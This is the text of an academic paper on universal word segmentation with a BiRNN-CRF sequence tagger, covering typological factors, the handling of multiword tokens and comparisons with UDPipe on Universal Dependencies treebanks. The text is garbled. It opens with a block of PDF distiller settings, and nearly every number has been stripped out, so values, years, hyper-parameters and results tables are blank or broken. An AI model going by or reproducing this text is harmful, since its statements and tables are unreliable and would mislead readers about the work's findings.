] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . 
universal word segmentation: implementation and interpretation

yan shao, christian hardmeier, joakim nivre
department of linguistics and philology, uppsala university
{yan.shao, christian.hardmeier, joakim.nivre}@lingfil.uu.se

abstract

word segmentation is a low-level nlp task that is non-trivial for a considerable number of languages. in this paper, we present a sequence tagging framework and apply it to word segmentation for a wide range of languages with different writing systems and typological characteristics. additionally, we investigate the correlations between various typological factors and word segmentation accuracy. the experimental results indicate that segmentation accuracy is positively related to word boundary markers and negatively to the number of unique non-segmental terms. based on the analysis, we design a small set of language-specific settings and extensively evaluate the segmentation system on the universal dependencies datasets. our model obtains state-of-the-art accuracies on all the ud languages. it performs substantially better on languages that are non-trivial to segment, such as chinese, japanese, arabic and hebrew, when compared to previous work.

introduction

word segmentation is the initial step for most higher-level natural language processing tasks, such as part-of-speech tagging (pos), parsing and machine translation. it can be regarded as the problem of correctly identifying word forms from a character string. word segmentation can be very challenging, especially for languages without explicit word boundary delimiters, such as chinese, japanese and vietnamese. even for space-delimited languages like english or russian, relying on white space alone generally does not result in adequate segmentation, as at least punctuation should usually be separated from the attached words. for some languages, the space-delimited units in the surface form are too coarse-grained and are therefore often further analysed, as in the cases of arabic and hebrew. even though language-specific word segmentation systems are near-perfect for some languages, it is still useful to have a single system that performs reasonably well with no or minimal language-specific adaptations.

word segmentation standards vary substantially with different definitions of the concept of a word. in this paper, we will follow the terminologies of universal dependencies (ud), where words are defined as basic syntactic units that do not always coincide with phonological or orthographic words. some orthographic tokens, known in ud as multiword tokens, therefore need to be broken into smaller units that cannot always be obtained by splitting the input character sequence.

to perform word segmentation in the ud framework, neither rule-based tokenisers that rely on white space nor the naive character-level sequence tagging model proposed previously (xue, ) are ideal. in this paper, we present an enriched sequence labelling model for universal word segmentation. it is capable of segmenting languages in very diverse written forms. furthermore, it simultaneously identifies the multiword tokens defined by the ud framework that cannot be resolved simply by splitting (note that this notion of multiword token has nothing to do with the notion of multiword expression (mwe) as discussed, for example, in sag et al. ( ).) transactions of the association for computational linguistics, vol. , pp. – . action editor: sebastian padó .
submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. the input character sequence. we adapt a regular sequence tagging model, namely the bidirectional recurrent neural networks with conditional random fields (crf) (lafferty et al., ) interface as the fundamental framework (birnn-crf) (huang et al., ) for word segmentation. the main contributions of this work include: . we propose a sequence tagging model for word segmentation, both for general purposes (mere splitting) and full ud processing (splitting plus occasional transduction). . we investigate the correlation between segmen- tation accuracy and properties of languages and writing systems, which is helpful in interpret- ing the gaps between segmentation accuracies across different languages as well as selecting language-specific settings for the model. . our segmentation system achieves state-of-the- art accuracy on the ud datasets and improves on previous work (straka and straková, ) especially for the most challenging languages. . we provide an open source implementation. word segmentation in ud the ud scheme for cross-linguistically consistent morphosyntactic annotation defines words as syn- tactic units that have a unique part-of-speech tag and enter into syntactic relations with other words (nivre et al., ). for languages that use whitespace as boundary markers, there is often a mismatch be- tween orthographic words, called tokens in the ud terminology, and syntactic words. typical examples are clitics, like spanish dámelo = da me lo ( token, words), and contractions, like french du = de le ( token, words). tokens that need to split into multiple words are called multiword tokens and can be further subdivided into those that can be handled by simple segmentation, like english cannot = can not, and those that require a more complex transduc- tion, like french du = de le. we call the latter non- segmental multiword tokens. in addition to multi- word tokens, the ud scheme also allows multitoken words, that is, words consisting of multiple tokens, such as numerical expressions like . https://github.com/yanshao /segmenter word segmentation and typological factors we begin with the analysis of the difficulty of word segmentation. word segmentation is fundamen- tally more difficult for languages like chinese and japanese because there are no explicit word bound- ary markers in the surface form (xue, ). for vietnamese, the space-segmented units are syllables that roughly correspond to chinese characters rather than words. to characterise the challenges of word segmentation posed by different languages, we will examine several factors that vary depending on lan- guage and writing system. we will refer to these as typological factors although most of them are only indirectly related to the traditional notion of linguis- tic typology and depend more on writing system. • character set size (cs) is the number of unique characters, which is related to how in- formative the characters are to word segmen- tation. each character contains relatively more information if the character set size is larger. • lexicon size (ls) is the number of unique word forms in a dataset, which indicates how many unique word forms have to be identified by the segmentation system. lexicon size in- creases as the dataset grows in size. • average word length (al) is calculated by dividing the total character count by the word count. 
it is negatively correlated with the density of word boundaries. if the average word length is smaller, there are more word boundaries to be predicted.

• segmentation frequency (sf) denotes how likely it is that space-delimited units are further segmented. it is calculated by dividing the word count by the space-segment count. languages like chinese and japanese have much higher segmentation frequencies than space-delimited languages.

• multiword token portion (mp) is the percentage of multiword tokens that are non-segmental.

• multiword token set size (ms) is the number of unique non-segmental multiword tokens.

the last two factors are specific to the ud scheme but can have a significant impact on word segmentation accuracy.

figure : k-means clustering (k = ) of the ud languages. pca is applied for dimensionality reduction.

table : pearson product-moment correlation coefficients between dataset size and the statistical factors (columns: cs, ls, al, sf, mp and ms).

all the languages in the ud dataset are characterised and grouped by the typological factors in figure . we standardise the statistics x of the proposed factors on the ud datasets with the arithmetic mean µ and the standard deviation σ as (x − µ) / σ. we use them as features and apply k-means clustering (k = ) to group the languages. principal component analysis (pca) (abdi and williams, ) is used for dimensionality reduction and visualisation.

the majority of the languages in ud are space-delimited with few or no multiword tokens and they are grouped at the bottom left of figure . they are statistically similar from the perspective of word segmentation. the semitic languages arabic and hebrew with rich non-segmental multiword tokens are positioned at the top. in addition, languages with large character sets and high segmentation frequencies, such as chinese, japanese and vietnamese, are clustered together. korean is distanced from the other space-delimited languages as it contains white-space delimiters but has a comparatively large character set. overall, the x-axis of figure is primarily related to character set size and segmentation frequency, while the y-axis is mostly associated with multiword tokens.

table : different ud datasets in the same languages and the statistical factors (rows: czech, czech-cac, czech-cltt, english, english-lines, english-partut, finnish, finnish-ftb, french, french-partut, french-sequoia, latin, latin-ittb, portuguese, portuguese-br, russian, russian-syntagrus, slovenian, slovenian-sst, swedish and swedish-lines; columns: cs, ls, al, sf, mp and ms).

dataset sizes for different languages in ud vary substantially. table shows the correlation coefficients between the dataset size in sentence number and the six typological factors. apart from the lexicon size, all the other factors, including multiword token set size, have no strong correlations with dataset size.

figure : tags employed for word segmentation. char.: on considère qu'environ allemands du wartheland ont péri pendant la période. tags: bexbiiiiiiiexbiebiiiiiexbiiiiexbiiiiiiiexbexbiiiiiiiiexbiexbiiexbiiiiiexbexbiiiiies. is a multitoken word, while qu'environ and du are multiword tokens that should be processed differently.

from table , we can see that the
factors, except for lexicon size, are relatively sta- ble across different ud treebanks for the same lan- guage, which indicates that they do capture proper- ties of these languages, although some variation in- evitably occurs due to corpus properties like genre. in this paper, we thoroughly investigate the corre- lations between the proposed statistical factors and segmentation accuracy. moreover, we aim to find specific settings that can be applied to improve seg- mentation accuracy for each language group. sequence tagging model word segmentation can be modelled as a character- level sequence labelling task (xue, ; chen et al., ). characters as basic input units are passed into a sequence labelling model and a sequence of tags that are associated with word boundaries are predicted. in this section, we introduce the boundary tags adopted in this paper. theoretically, binary classification is sufficient to indicate whether a character is the end of a word for segmentation. in practice, more fine-grained tagsets result in higher segmentation accuracy (zhao et al., ). following the work of shao et al. ( ), we employ a baseline tagset consisting of four tags: b, i, e, and s, to indicate a character positioned at the beginning (b), inside (i), or at the end (e) of a word, or occurring as a single-character word (s). the baseline tagset can be applied to word seg- mentation of chinese and japanese without further modification. for languages with space-delimiters, we add an extra tag x to mark the characters, mostly spaces, that do not belong to any words/tokens. as illustrated in figure , the regular spaces are marked with x while the space in a multitoken word like is disambiguated with i. to enable the model to simultaneously identify non-segmental multiword tokens for languages like spanish and arabic in the ud framework, we ex- tend the tagset by adding four tags b, i, e, s that correspond to b, i, e, s to mark corresponding tags applied languages baseline tags b, i, e, s chinese, japanese, ... boundary x russian, hindi, ... transduction b, i, e, s spanish, arabic, ... joint sent. seg. t, u all languages table : tag set for universal word segmentation. positions in non-segmental multiword tokens and to indicate their occurrences. as shown in figure , the multiword token qu’environ is split into qu’ and environ and therefore the corresponding tags are biebiiiiie. this contrasts with du, which should be transduced into de and le. moreover, the extra tags disambiguate whether the multiword to- kens should be split or transduced according to the context. for instance, aÜØð (wamimma) in arabic is occasionally split into ð (wa) and aÜØ (mimma) but more frequently transduced into ð (wa), áÓ (min) and aÓ (ma) . the corresponding tags are sbie and biie, respectively. the transduction of the identi- fied multiword tokens will be described in detail in the following section. the complete tagset is summarised in table . the proposed sequence model can easily be ex- tended to perform joint sentence segmentation by adding two more tags to mark the last character of a sentence (de lhoneux et al., ). t is used if the character is a single-character word and u otherwise. t and u can be used together with b, i, e, s, x for general segmentation, or with b, i, e, s additionally for full ud processing. joint sentence segmentation is not addressed any further in this paper. neural networks for segmentation . 
main network the main network for regular segmentation as well as non-segmental multiword token identification is an adaptation of the birnn-crf model (huang et al., ) (see figure ). the input characters can be represented as con- 夏 天 太 热 (too) (hot)(summer) character representations gru gru gru gru forward rnn gru gru gru gru backward rnn b e s s crf layer 太 热夏天output figure : the birnn-crf model for segmentation. the dashed arrows indicate that dropout is applied. ventional character embeddings. alternatively, we employ the concatenated -gram model introduced by shao et al. ( ). in this representation (fig- ure ), the pivot character in a given context is rep- resented as the concatenation of the character vec- tor representation along with the local bigram and trigram vectors. the concatenated n-grams encode rich local information as the same character has dif- ferent yet closely related vector representations in different contexts. for each n-gram order, we use a single vector to represent the terms that appear only once in the training set while training. these vectors are later used as the representations for unknown characters and n-grams in the development and test sets. all the embedding vectors are initialised ran- domly. the character vectors are passed to the forward and backward recurrent layers. gated recurrent units (gru) (cho et al., ) are employed as the basic recurrent cell to capture long term dependencies and sentence-level information. dropout (srivastava et al., ) is applied to both the inputs and the out- puts of the bidirectional recurrent layers. a first- order chain crf layer is added on top of the recur- 夏 天 太 热 (too) (hot)(summer) vi,i vi− ,i vi− ,i+ n-gram character representation v figure : concatenated -gram model. the third character is the pivot character in the given context. rent layers to incorporate transition information be- tween consecutive tags, which ensures that the op- timal sequence of tags over the entire sentence is obtained. the optimal sequence can be computed efficiently via the viterbi algorithm. . transduction the non-segmental multiword tokens identified by the main network are transduced into correspond- ing components in an additional step. based on the statistics of the multiword tokens to be trans- duced on the entire ud training sets, . % only have one possible transduction, which indicates that the main ambiguity of non-segmental multiword to- kens comes with identification, not transduction. we therefore transduce the identified non-segmental multiword tokens in a context-free fashion. for mul- tiword tokens with two or more valid transductions, we only adopt the most frequent one. in most languages that have multiword tokens, the number of unique non-segmental multiword to- kens is rather limited, such as in spanish, french and italian. for these languages, we build dictionar- ies from the training data to look up the multiword tokens. however, in some languages like arabic and hebrew, multiword tokens are very productive and therefore cannot be well covered by dictionar- ies generated from training data. some of the avail- able external dictionary resources with larger cover- age, for instance the mila lexicon (itai and wint- ner, ), do not follow the ud standards. in this paper, we propose a generalising ap- proach to processing non-segmental multiword to- kens. 
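as a concrete illustration of the dictionary-based handling of multiword tokens described above, the following python sketch builds a lookup table from (token, components) pairs observed in training data and keeps the most frequent expansion for each token, mirroring the context-free choice made here. it is a minimal sketch under assumed input conventions, not the released implementation, and all function names are illustrative.

```python
from collections import Counter, defaultdict

def build_mwt_dictionary(training_pairs):
    """collect the expansions observed for each multiword token and keep the most frequent one.

    training_pairs: iterable of (surface_token, components) pairs, e.g.
    ("du", ("de", "le")), as extracted from a ud training set.
    """
    counts = defaultdict(Counter)
    for surface, components in training_pairs:
        counts[surface][tuple(components)] += 1
    # context-free choice: for tokens with several valid expansions, keep the most frequent one
    return {surface: max(expansions, key=expansions.get)
            for surface, expansions in counts.items()}

def transduce(surface, mwt_dict):
    """look the identified token up; unknown tokens are returned unchanged here."""
    return list(mwt_dict.get(surface, (surface,)))

pairs = [("du", ("de", "le")), ("du", ("de", "le")), ("des", ("de", "les"))]
mwt_dict = build_mwt_dictionary(pairs)
print(transduce("du", mwt_dict))    # ['de', 'le']
print(transduce("chat", mwt_dict))  # ['chat']
```

for languages where such tokens are too productive to be covered by a dictionary, the sequence-to-sequence transducer described next can take over for tokens that the lookup table does not contain.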
if there are more than unique multi- word tokens in the training set for a language, we character embedding size gru/lstm state size optimiser adagrad initial learning rate (main) . decay rate . gradient clipping . initial learning rate (encoder-decoder) . dropout rate . batch size table : hyper-parameters for segmentation. train an attention-based encoder-decoder (bahdanau et al., ) equipped with shared long-short term memory cells (lstm) (hochreiter and schmidhu- ber, ). at test time, identified non-segmental multiword tokens are first queried in the dictionary. if not found, the segmented components are gen- erated with the encoder-decoder as character-level transduction. overall, we utilise rich context to identify non-segmental multiword tokens, and then apply a combination of dictionary and sequence-to- sequence encoder-decoder to transduce them. . implementation our universal word segmenter is implemented us- ing the tensorflow library (abadi et al., ). sentences with similar lengths are grouped into the same bucket and padded to the same length. we construct sub-computational graphs for each bucket so that sentences of different lengths are processed more efficiently. table shows the hyper-parameters adopted for the neural networks. we use one set of parame- ters for all the experiments as we aim for a sim- ple universal model, although fine-tuning the hyper- parameters on individual languages might result in additional improvements. the encoder-decoder is trained prior to the main network. the weights of the neural networks, including the embeddings, are initialised using the scheme introduced in glo- rot and bengio ( ). the network is trained us- ing back-propagation. all the random embeddings are fine-tuned during training by back-propagating gradients. adagrad (duchi et al., ) with mini- batches is employed for optimization. the initial learning rate η is updated with a decay rate ρ. the encoder-decoder is trained with the unique non-segmental multiword tokens extracted from the training set. % of the total instances are subtracted for validation. the model is trained for epochs and the score of how many outputs exactly match the references is used for selecting the weights. for the main network, word-level f -score is used to measure the performance of the model after each epoch on the development set. the network is trained for epochs and the weight of the best epoch is selected. to increase efficiency and reduce memory de- mand both for training and decoding, we truncate sentences longer than characters. at decoding time, the truncated sentences are reassembled at the recorded cut-off points in a post-processing step. experiments . datasets and evaluation datasets from universal dependencies . (nivre et al., ) are used for all the word segmentation ex- periments. in total, there are datasets in lan- guages that vary substantially in size. the training sets are available in languages. we follow the standard splits of the datasets. if no development set is available, % of the training set is subtracted. we adopt word-level precision, recall and f - score as the evaluation metrics. the candidate and the reference word sequences in our experiments may not share the same underlying characters due to the transduction of non-segmental multiword to- kens. the alignment between the candidate words and the references becomes unclear and therefore it is difficult to compute the associated scores. 
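the next paragraph resolves this with a longest-common-subsequence alignment between candidate and reference words; the following python sketch illustrates that evaluation procedure. it is a simplified stand-in for the adapted conll evaluation script, with illustrative function names.

```python
def lcs_matches(candidate, reference):
    """length of the longest common subsequence of two word lists (classic dynamic programming)."""
    m, n = len(candidate), len(reference)
    dp = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m):
        for j in range(n):
            if candidate[i] == reference[j]:
                dp[i + 1][j + 1] = dp[i][j] + 1
            else:
                dp[i + 1][j + 1] = max(dp[i][j + 1], dp[i + 1][j])
    return dp[m][n]

def word_level_scores(candidate, reference):
    """word-level precision, recall and f-score based on lcs-aligned words."""
    matched = lcs_matches(candidate, reference)
    p = matched / len(candidate) if candidate else 0.0
    r = matched / len(reference) if reference else 0.0
    f = 2 * r * p / (r + p) if (r + p) else 0.0
    return p, r, f

# the candidate and reference need not share the same characters after transduction
print(word_level_scores(["de", "le", "chat"], ["du", "chat"]))
```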
to resolve this issue, we use the longest common subsequence algorithm to align the candidate and the reference words. the matched words are compared and the evaluation scores are computed accordingly:

r = |c ∩ r| / |r|
p = |c ∩ r| / |c|
f = 2 · r · p / (r + p)

where c and r denote the sequences of candidate words and reference words, and |c|, |r| are their lengths. |c ∩ r| is the number of candidate words that are aligned to reference words by the longest common subsequence algorithm. the word-level evaluation metrics adopted in this paper are different from the boundary-based alternatives (palmer and burger, ). we adapt the evaluation script from the conll shared task (zeman et al., ) to calculate the scores. we employ the version that was used in the conll shared task on ud parsing. in the following experiments, we only report the f-score.

in the following sections, we thoroughly investigate correlations between several language-specific characteristics and segmentation accuracy. all the experimental results in section . are obtained on the development sets. the test sets are reserved for final evaluation, reported in section . .

. language-specific characteristics

. . word-internal spaces

for vietnamese and other languages with similar historical backgrounds, such as zhuang and hmongic languages (zhou, ), the space-delimited syllables containing no punctuation are never segmented but joined into words with word-internal spaces instead. the space-delimited units can therefore be applied as the basic elements for tag prediction if we pre-split punctuation. word segmentation for these languages thus becomes practically the same as for chinese and japanese.

table : different segmentation units employed for word segmentation on vietnamese (columns: basic unit, f-score, training time in seconds; rows: latin character, space-delimited unit). concatenated -gram is not used.

table shows that a substantial improvement can be achieved if we use space-delimited syllables as the basic elements for word segmentation for vietnamese. it also drastically increases both training and decoding speed as the sequence of tags to be predicted becomes much shorter.

. . character representation

we apply regular character embeddings and concatenated -gram vectors introduced in section . to the input characters and test their performances respectively.

figure : segmentation results with unigram character embeddings (dashed) and concatenated -gram vectors for character representations with different numbers of training instances n (f-score against n for arabic, catalan, chinese, english, japanese and spanish).

first, the experiments are extensively conducted on all the languages with the full training sets. the results show that the concatenated -gram model is substantially better than the regular character embeddings on chinese, japanese and vietnamese, but notably worse on spanish and catalan. for all the other languages, the differences are marginal. to gain more insights, we select six languages, namely arabic, catalan, chinese, japanese, english and spanish, for more detailed analysis via learning curve experiments. the training sets are gradually extended by sentences at a time. the results are shown in figure . regardless of the amounts of training data and the other typological factors, concatenated -grams are better on chinese and japanese and worse on spanish and catalan.
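a minimal python sketch of the concatenated 3-gram representation discussed above is given below. randomly initialised vectors stand in for the trainable embedding tables, the choice of n-gram windows (pivot character, the bigram ending at the pivot, the trigram centred on it) is one plausible reading of the description, and the dimensions are illustrative rather than the hyper-parameters actually used.

```python
import numpy as np

def concatenated_3gram_vectors(chars, dim_uni=64, dim_bi=32, dim_tri=32, seed=0):
    """represent every character as the concatenation of its unigram, bigram and trigram vectors.

    randomly initialised vectors stand in for trainable embedding tables; the single
    shared vector for rare/unseen n-grams used during training is omitted here.
    """
    rng = np.random.default_rng(seed)
    tables = {1: {}, 2: {}, 3: {}}
    dims = {1: dim_uni, 2: dim_bi, 3: dim_tri}

    def lookup(order, key):
        table = tables[order]
        if key not in table:
            table[key] = rng.normal(size=dims[order])
        return table[key]

    padded = ["<s>"] + list(chars) + ["</s>"]
    vectors = []
    for i in range(1, len(padded) - 1):
        uni = lookup(1, padded[i])                                   # the pivot character
        bi = lookup(2, (padded[i - 1], padded[i]))                   # bigram ending at the pivot
        tri = lookup(3, (padded[i - 1], padded[i], padded[i + 1]))   # trigram centred on the pivot
        vectors.append(np.concatenate([uni, bi, tri]))
    return np.stack(vectors)

print(concatenated_3gram_vectors("夏天太热").shape)  # (4, 128)
```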
we expect the concatenated -gram representation to outperform simple character embeddings on all languages with a large character set but no space de- limiters. since adopting the concatenated -gram model drastically enlarges the embedding space, in the following experiments, including the final testing phase, concatenated -grams are only applied to chinese, japanese and vietnamese. . . . . n/ f - s co re arabic chinese english korean russian spanish figure : segmentation results with (dashed) and without space delimiters with different numbers of training instances n. . . space delimiters chinese and japanese are not delimited by spaces. additionally, continuous writing without spaces (scriptio continua) is evidenced in most classical greek and latin manuscripts. we perform two sets of learning curve experiments to investigate the im- pact of white space on word segmentation. in the first set, we keep the datasets in their original forms. in the second set, we omit all white space. the ex- perimental results are presented in figure . in general, there are huge discrepancies between the accuracies with and without spaces, showing that white space acts crucially as a word boundary in- dicator. retaining the original forms of the space- delimited languages, very high accuracies can be achieved even with small amounts of training data as the model quickly learns that space is a reliable word boundary indicator. moreover, we obtain rel- atively lower scores on space-delimited languages when space is ignored than chinese using compara- ble amounts of training data, which shows that chi- nese characters are more informative to word bound- ary prediction, due to the large character set size. . . non-segmental multiword tokens the concept of multiword tokens is specific to ud. to explore how the non-segmental multiword tokens, as opposed to pure segmentation, influence . . n/ f - s co re arabic french hebrew italian portuguese spanish figure : segmentation results with and without (dashed) processing non-segmental multiword to- kens with different training instances n. language data size evaluation scores training validation acc mfs arabic , . . hebrew , . . table : accuracy of the seq seq transducer on ara- bic and hebrew. segmentation accuracy, we conduct relevant experi- ments on selected languages. similarly to the previ- ous section, two sets of learning curve experiments are performed. in the second set, all the multiword tokens that require transduction are regarded as sin- gle words without being processed. the results are presented in figure . word segmentation with full ud processing is no- tably more challenging for arabic and hebrew. ta- ble shows the evaluation of the encoder-decoder as the transducer for non-segmental multiword tokens on arabic and hebrew. the evaluation metrics acc and mf-score (mfs) are adapted from the metrics used for machine transliteration evaluation (li et al., ). acc is exact match and mfs is based on edit distance. the transducer yields relatively higher scores on hebrew while it is more challenging to process arabic. in addition, different approaches to transducing the non-segmental multiword tokens are evaluated in table . in the condition none, the identified non- none dictionary transducer mix arabic . . . . hebrew . . . . table : segmentation accuracies on arabic and hebrew with different ways of transducing non- segmental multiword tokens. segmental multiword tokens remain unprocessed. 
in dictionary, they are mapped via the dictionary de- rived from training data if found in the dictionary. in transducer, they are all transduced by the attention- based encoder-decoder. in mix, in addition to utilis- ing the mapping dictionary, the non-segmental terms not found in the dictionary are transduced with the encoder-decoder. the results show that when the encoder-decoder is applied alone, it is worse than only using the dictionaries, but additional improve- ments can be obtained by combining both of them. the accuracy differences associated with non- segmental multiword tokens are nonetheless marginal on the other languages as shown in figure . regardless of their frequent occurrences, mul- tiword tokens are easy to process in general when the set of unique non-segmental multiword tokens is small. . . correlations with accuracy we investigate the correlations between the pro- posed typological factors in section and segmen- tation accuracy using linear regression with huber loss (huber, ). the factors are used in addition to training set size as the features to predict the seg- mentation accuracies in f -score. to collect more data samples, apart from experimenting with the full training data for each set, we also use smaller sets of , , and , training instances to train the models respectively if the training set is large enough. the features are standardised with the arith- metic mean and the standard deviation before fitting the linear regression model. the correlation coefficients of the linear regres- sion model are presented in figure . we can see that segmentation frequency and multiword token set size are negatively correlated with segmentation accuracy. overall, the ud datasets are strongly bi- ased towards space-delimited languages. training set size is therefore not a strong factor as high accu- ts cs ls al sf mp ms − · − figure : correlation coefficients between segmen- tation accuracy and the typological factors in the lin- ear regression model. the factors are training set size (ts), character set size (cs), lexicon size (ls), average word length (al), segmentation frequency (sf), multitoken word portion (mp) and multitoken word size (ms). racies can be obtained with small amounts of train- ing data, which is consistent with the results of all the learning curve experiments. the other typolog- ical factors such as average word length and lexi- con size are less relevant to segmentation accuracy. referring back to figure , segmentation frequency and multiword token set size as the most influen- tial factors, are also the primary principal compo- nents that categorise the ud languages into different groups. . . language-specific settings our model obtains competitive results with only a minimal number of straightforward language- specific settings. based on the previous analysis of segmentation accuracy and typological factors, re- ferring back to figure , we apply the following settings, targeting on specific language groups, to the segmentation system on the final test sets. the language-specific settings can be applied to new lan- guages beyond the ud datasets based on an analysis of the typological factors. . for languages with word-internal spaces like vietnamese, we first separate punctuation and then use space-delimited syllables for bound- space nltk udpipe this paper . . . . table : average evaluation scores on ud lan- guages, excluding chinese, japanese, vietnamese, arabic and hebrew. ary prediction. . 
for languages with large character sets and no space delimiters, like chinese and japanese, we use concatenated -gram representations. . for languages with more than unique non- segmental multiword tokens, like arabic and hebrew, we use the encoder-decoder model for transduction. . for other languages, the universal model is suf- ficient without any specific adaptation. . final results we compare our segmentation model to udpipe (straka and straková, ) on the test sets. udpipe contains word segmentation, pos tagging, morpho- logical analysis and dependency parsing models in a pipeline. the word segmentation model in ud- pipe is also based on rnn with gru. for efficiency, udpipe has a smaller character embedding size and no crf interface. it also relies heavily on white- space and uses specific configurations for languages in which word-internal spaces are allowed. auto- matically generated suffix rules are applied jointly with a dictionary query to handle multiword tokens. moreover, udpipe uses language-specific hyper- parameters for chinese and japanese. we employ udpipe . with the publicly avail- able ud . models. the presegmented option is enabled as we assume the input text to be preseg- mented into sentences so that only word segmen- tation is evaluated. in addition, the conll shared task involved some test sets for which no specific training data were available. this included a number of parallel test sets of known languages, for which we apply the models trained on the standard tree- banks, as well as four surprise languages, namely buryat, kurmanji, north sami and upper sorbian, for which we use the small annotated data samples provided in addition to the test sets by the shared http://hdl.handle.net/ / - task to build models and evaluation on those lan- guages. the main evaluation results are shown in table . we also report the macro average f -scores. the scores of the surprise languages are excluded and presented separately as no corresponding udpipe models are available. our system obtains higher segmentation accuracy overall. it achieves substantially better accuracies on languages that are challenging to segment, namely chinese, japanese, vietnamese, arabic and hebrew. the two systems yield very similar scores, when these languages are excluded as shown in table , in which the two systems are also compared with two rule-based baselines, a simple space-based to- keniser and the tokenisation model for english in nltk (loper and bird, ). the nltk model obtains relatively high accuracy while the space- based baseline substantially underperforms, which indicates that relying on white space alone is insuffi- cient for word segmentation in general. on the ma- jority of the space-delimited languages without pro- ductive non-segmental multiword tokens, both ud- pipe and our segmentation system yield near-perfect scores in table . in general, referring back to fig- ure , languages that are clustered at the bottom-left corner are relatively trivial to segment. the evaluation scores are notably lower on semitic languages as well as languages without word delimiters. nonetheless, our system obtains substantially higher scores on the languages that are more challenging to process. for chinese, japanese and vietnamese, our sys- tem benefits substantially from the concatenated -gram character representation, which has been demonstrated in section . . . besides, we em- ploy a more fine-grained tagset with crf loss in- stead of the binary tags adopted in udpipe. as presented in zhao et al. 
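to make the fine-grained tagging scheme discussed above concrete, the following python sketch encodes a token sequence into character-level b/i/e/s tags with x on the separating spaces, and decodes a predicted tag sequence back into words. it is a simplified sketch: the additional tags for non-segmental multiword tokens and for joint sentence segmentation are omitted, and the helper names are illustrative.

```python
def encode_tags(tokens):
    """map a token sequence onto character-level b/i/e/s tags, with x on the separating spaces."""
    chars, tags = [], []
    for k, token in enumerate(tokens):
        token_tags = ["s"] if len(token) == 1 else ["b"] + ["i"] * (len(token) - 2) + ["e"]
        chars.extend(token)
        tags.extend(token_tags)
        if k < len(tokens) - 1:
            chars.append(" ")
            tags.append("x")
    return chars, tags

def decode_tags(chars, tags):
    """recover words from a predicted tag sequence; characters tagged x are dropped."""
    words, current = [], ""
    for c, t in zip(chars, tags):
        if t == "x":
            continue
        current += c
        if t in ("e", "s"):
            words.append(current)
            current = ""
    if current:
        words.append(current)
    return words

chars, tags = encode_tags(["too", "hot"])
print("".join(tags))            # 'biexbie'
print(decode_tags(chars, tags)) # ['too', 'hot']
```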
( ), more fine-grained tagging schemes outperform binary tags, which is supported by the experimental results on morpheme segmentation reported in ruokolainen et al. ( ). we further investigate the merits of the fine- grained tags over the binary tags as well as the ef- fectiveness of the crf interface by the experiments presented in table with the variances of our seg- mentation system. the fine-grained tags denote the boundary tags introduced in table . the binary dataset udpipe this paper dataset udpipe this paper dataset udpipe this paper ancient greek . . ancient greek-proiel . . arabic . . arabic-pud . . basque . . bulgarian . . catalan . . chinese . . croatian . . czech . . czech-cac . . czech-cltt . . czech-pud . . danish . . dutch . . dutch-lassysmall . . english . . english-lines . . english-pud . . english-partut . . estonian . . finnish . . finnish-ftb . . finnish-pud . . french . . french-pud . . french-partut . . french-sequoia . . galician . . galician-treegal . . german . . german-pud . . gothic . . greek . . hebrew . . hindi . . hindi-pud . . hungarian . . indonesian . . irish . . italian . . italian-pud . . japanese . . japanese-pud . . kazakh . . korean . . latin . . latin-ittb . . latin-proiel . . latvian . . norwegian-bokmaal . . norwegian-nynorsk . . old church slavonic . . persian . . polish . . portuguese . . portuguese-br . . portuguese-pud . . romanian . . russian . . russian-pud . . russian-syntagrus . . slovak . . slovenian . . slovenian-sst . . spanish . . spanish-ancora . . 